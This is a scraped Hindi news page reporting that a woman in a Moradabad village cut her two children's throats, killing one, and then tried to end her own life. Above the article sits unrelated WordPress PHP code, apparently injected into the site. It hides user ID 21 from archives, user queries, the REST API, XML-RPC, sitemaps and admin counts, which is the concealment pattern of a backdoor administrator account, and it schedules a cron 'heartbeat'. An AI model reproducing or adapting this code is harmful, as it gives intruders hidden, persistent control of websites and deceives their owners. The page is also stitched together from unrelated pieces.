add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
महिला ने अपने बच्चों का गला काटा और अपना जीवन भी समाप्त करने का किया प्रयास - Press Ki Taquat
No Result
View All Result
मुरादाबाद , 9 अगस्त ( प्रेस की ताकत बयूरो): उत्तर प्रदेश के मुरादाबाद जिले के घोसीपुरा गांव में एक महिला ने अपने दो बच्चों का गला काटकर जान से मारने की कोशिश की। परिजनों ने कमरे में बच्चों को खून से लथपथ देखा तो पुलिस को सूचना दी। बताया जा रहा है कि इनमें से एक बच्चे ने दम तोड़ दिया जबकि दूसरा जिंदगी और मौत से जूझ रहा है। महिला ने अपने बच्चों का गला काट और अपना जीवन भी समाप्त करने का प्रयास किया।
पुलिस के अनुसार, प्रीति के पति देवेंद्र, जो एक फर्म में ठेकेदार के रूप में काम करते हैं,आर्थिक मुद्दों को और नौकरी बदलने की बात को लेकर दोनों के बीच अक्सर झगड़े होते थे। परिवार की सदस्य मुन्नी देवी ने पुलिस को बताया कि उनकी बहू ने सोते समय बच्चों पर किसी नुकीली चीज से हमला किया।
पुलिस ने कहा कि एक 4 वर्षीय बच्चे ने मौके पर ही दम तोड़ दिया, जबकि महिला और उसके बड़े बेटे को में एक निजी चिकित्सा सुविधा में ले जाया गया।
महिला के खिलाफ आईपीसी की धारा 302 (हत्या की सजा) और 309 (आत्महत्या का प्रयास) के तहत प्राथमिकी दर्ज की गई है।
Post Views: 165
No Result
View All Result